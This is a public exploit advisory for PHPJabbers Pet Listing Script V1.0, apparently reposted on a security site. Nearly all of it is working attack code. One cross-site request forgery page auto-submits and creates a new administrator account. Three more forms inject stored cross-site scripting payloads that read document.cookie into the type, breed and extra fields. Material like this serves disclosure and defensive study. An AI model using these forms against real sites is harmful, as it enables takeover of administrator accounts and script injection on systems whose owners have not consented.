Pet Listing Script V1.0 - Multiple Vulnerabilties

2014.01.15
Credit: HackXBack
Risk: Low
Local: No
Remote: Yes
CVE: N/A

Pet Listing Script V1.0 - Multiple Vulnerabilties ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/pet-listing-script/ .:. Tested On Demo : http://www.phpjabbers.com/demo/pl_10/index.php?controller=Admin&action=login #################################################################### ===[ Exploit ]=== [1] Cross Site Request Forgery ============================== [Add Admin] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminUsers&action=create"> <input type="hidden" name="user_create" value="1"/> <input type="hidden" name="role_id" value="1"/> <input type="hidden" name="username" value="Admin"/> <input type="hidden" name="password" value="Password"/> <input type="hidden" name="status" value="T"/> </form> </body> </html> [2] Multiple Cross Site Scripting ================================== # CSRF with XSS Exploit: I. Xss In Type <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminTypes&action=create"> <input type="hidden" name="type_create" value="1"/> <input type="hidden" name="type_title" value="<script>alert(document.cookie);</script>"/> </form> </body> </html> II. Xss In Breed <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminBreeds&action=create"> <input type="hidden" name="breed_create" value="1"/> <input type="hidden" name="breed_title" value="<script>alert(document.cookie);</script>"/> <input type="hidden" name="type_id" value="2"/> </form> </body> </html> III. Xss In Extra <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminExtras&action=create"> <input type="hidden" name="extra_create" value="1"/> <input type="hidden" name="extra_title" value="<script>alert(document.cookie);</script>"/> </form> </body> </html> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top